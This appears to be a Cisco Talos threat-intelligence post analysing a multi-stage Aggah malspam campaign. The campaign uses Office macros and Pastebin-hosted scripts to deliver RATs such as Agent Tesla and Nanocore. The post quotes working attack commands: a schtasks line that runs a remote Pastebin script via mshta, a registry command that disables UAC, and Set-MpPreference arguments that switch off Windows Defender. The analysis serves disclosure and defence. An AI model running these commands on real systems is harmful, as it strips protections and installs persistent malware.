- Cisco Talos has observed an upgraded version of a malspam campaign known to distribute multiple remote access trojans (RATs).
- The infection chain utilized in the attacks is highly modularized.
- The attackers utilize publicly available infrastructure such as Bitly and Pastebin (spread over a number of accounts) to direct and host their attack components.
- Network-based detection, although important, should be combined with endpoint protections to combat this threat and provide multiple layers of security.
Cisco Talos has observed a new Aggah campaign consisting of the distribution of malicious Microsoft Office documents (maldocs) via malicious spam (malspam) emails distributing a multi-stage infection to a target user’s endpoint.
The final payload of the infection consists of a variety of Remote-Access-Tool (RAT) families such as:
How did it work?
Many attackers and malware operators usually utilize their own infrastructure (or hacked domains) to act as delivery mechanisms for their infection chains. Consistent with previous Aggah campaigns, this campaign also focuses on the use of pastebin[.]com for all its infrastructure needs. However, this campaign now utilizes multiple Pastebin accounts to host different stages of the attack.
The key components of the attack are:
- Stage 1: Malspam delivering documents with malicious macros.
- Stage 2: Malicious VBScripts used to instrument the actual attack.
- Stage 2A: Malicious .Net based binaries for disabling security features on the endpoint.
- Stage 3: Malicious VBScripts and .NET-based injectors and RATs (final payload).
The Aggah campaign has been quite prolific recently and the attackers have used their own infrastructure, as well as hosting sites such as Pastebin to host their infection components.
This new campaign, however, introduces a few key upgrades to the attack chain:
- Use of an additional .NET binary (and embedded VBScript and PowerShell scripts) to disable protection and detection mechanisms on the infected endpoint.
- Distribution of attack components (scripts and encoded MZs) across multiple free Pastebin accounts to modularize the attack infrastructure.
- Use of a new Pastebin PRO account to host all the final RAT payloads. This also indicates the move from the “hagga” to the “alphabets3” Pastebin account for continued operations (a pro account enables the attackers to modify the pastes and serve different malware at different points in time).
Initial infection vector
This threat arrives on the endpoint typically as a malicious email. The email attempts to appear legitimate while being vague at the same time. This is done to trick the target end-user into opening the malicious attachment (maldoc) that activates the infection on the endpoint.
A typical malspam email for this threat looks like:
Malicious document analysis
The maldocs distributed by this threat contain a simple and effective VB macro script that is used to download the next stage of the infection and execute it on the endpoint.
The maldocs themselves are essentially empty and contain minimal to no content in them.
Some examples of the names of the maldocs distributed by this threat:
- Items List.csv
- PO#422511 Hager.xls
- Purchase Order.xls
- Request for Quotation.xls
- RFQ Air Shipment.csv
- RFQ List #422513.csv
- RFQ List #422513..csv
- RFQ List #422513 t.csv
- Specification sheet and P.o 3053432.xls
Malicious VBA analysis
Once opened, the malicious VBA contacts a shortened “j.mp” URL (redirects to pastebin[.]com) that points to the next stage of the infection. The second stage of the infection (in fact all the subsequent stages) is hosted on Pastebin URLs.
Typical examples of the VB macro are:
Newer versions of the macro also aim to establish persistence via the Windows registry for the second-stage payload’s execution using mshta.
The persistence is set up in the registry key:
Infection Stage 2: Mshta script
The second-stage payload downloaded by the maldoc’s macro and executed using mshta is an escaped VBScript.
The second-stage payload carries out the following actions:
- Setup a malicious scheduled task for another component (payload Stage 3 — Activate RAT payload) using the schtasks command. E.g
schtasks /create /sc MINUTE /mo 70 /tn <task_name> /tr ""mshta http://pastebin.com/raw/<resource_id>"" /F
- [Optional] Establish persistence for itself or another component (defined by another pastebin URL).
- Download a .NET executable for windows and execute it (payload stage 2A). This executable is designed to disable security features on the endpoint to evade detection.
Deobfuscated second-stage payload:
The entire infection chain is illustrated here for a better understanding of the highly modularized attack:
Infection Stage 2A: Elevate, evade, disable
This component is responsible for ensuring the seamless execution of the infection chain. It is implemented as a .NET based executable that in-turn executes an elevated VBscript to disable various protection mechanisms so that it can evade detection on the endpoint.
The executable extracts the VBS from its resources and dumps it into a randomly named VBS file. The executable also creates an ‘inf’ file that is then used to execute the malicious VBS using “cmstp” (cmstp.exe is used as a means of UAC bypass here).
Structure of the inf file:
In order to ensure AV evasion the following actions are taken by the VBS:
- Ensure that the script is running with elevated privileges, else restart with elevated permissions.
- Disable UAC notifications by modifying registry value “EnableLUA” using command:
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
- Disable Windows Defender features by running powershell cmdlet “Set-MpPreference” with arguments:
- -DisableRealtimeMonitoring $true
- -DisableBehaviorMonitoring $true
- -DisableBlockAtFirstSeen $true
- -DisableIOAVProtection $true
- -DisableScriptScanning $true
- -SubmitSamplesConsent 2
- -MAPSReporting 0
- -HighThreatDefaultAction 6 -Force
- -ModerateThreatDefaultAction 6
- -LowThreatDefaultAction 6
- -SevereThreatDefaultAction 6
- Use PowerShell to create process and path exclusions for Windows Defender scans for
A sample exclusions-enforcement script:
Infection Stage 3
This payload is a VBScript designed to instrument a .NET based injector component that activates a RAT payload (the final stage) on the infected endpoint.
A typical stage 3 payload looks like:
The infection/injection process works as follows:
- The Stage 3 payload VBScript downloads the injector instrumentation script from a Pastebin URL.
- The injector instrumentation script decompresses the injector binary (a .NET based DLL) and loads it into memory ready to be executed via an exported API of the DLL.
- The RAT payload is then downloaded and decoded.
- An API of the injector DLL is then called to inject the RAT payload into a specified benign process.
- The API accepts a benign executable’s name (such as “calc.exe”), spawns a new suspended process and uses process-hollowing to inject and activate the RAT payload on the infected endpoint.
This technique of decompressing the injector and subsequent injection of the final payload into a benign process using process-hollowing has been extensively used by the DarkComet malware family. As seen in this campaign (and other campaigns leveraging DarkComet), the injector component (DLL) is usually obfuscated to make analysis difficult.
Sub-component script that decompresses the injector module:
Final stage: RAT components
The final malware payloads served by such campaigns can vary from ransomware to RAT families. In the case of the campaign disclosed here, we have observed multiple families being distributed:
- Agent Tesla
- Nanocore RAT
The following pastebin accounts have been used to host malicious code for this campaign on Pastebin:
Out of all these accounts, the “alphabates3” stands out specifically. This is a PRO account. A pro account enables the operator to modify the content of already created pastes. Also, this account hosts all the RAT payload samples discovered in this campaign so far, Thus it is highly likely that the attackers modify existing pastes to re-instrument infection chains to deliver different malware at different points in time.
The actors behind this campaign are clearly motivated and continue to operate leveraging freely available infrastructure such as Pastebin, Bitly (j[.]mp) and others. We have also observed a steady evolution in their tactics ranging from modularization of their attack chains to antivirus evasion tactics to thwart detections. The fact that these actors continue to distribute a wide variety of malware indicates that they are constantly growing their malware arsenal. The campaign started in January 2020 and is still ongoing. This campaign also shows us that while network-based detection is important, it must be complemented with system behavior analysis and endpoint protections.
Ways our customers can detect and block this threat are listed below.
Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware detailed in this post. Below is a screenshot showing how AMP can protect customers from this threat. Try AMP for free here.
Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.
Email Security can block malicious emails sent by threat actors as part of their campaign.
Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.
Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.
Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.
Additional protections with context to your specific environment and threat data are available from the Firepower Management Center.
Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. The following Snort SIDs were released to detect this threat: 53745 - 53748.
Cisco AMP users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click below:
Malicious Scripts and MZs: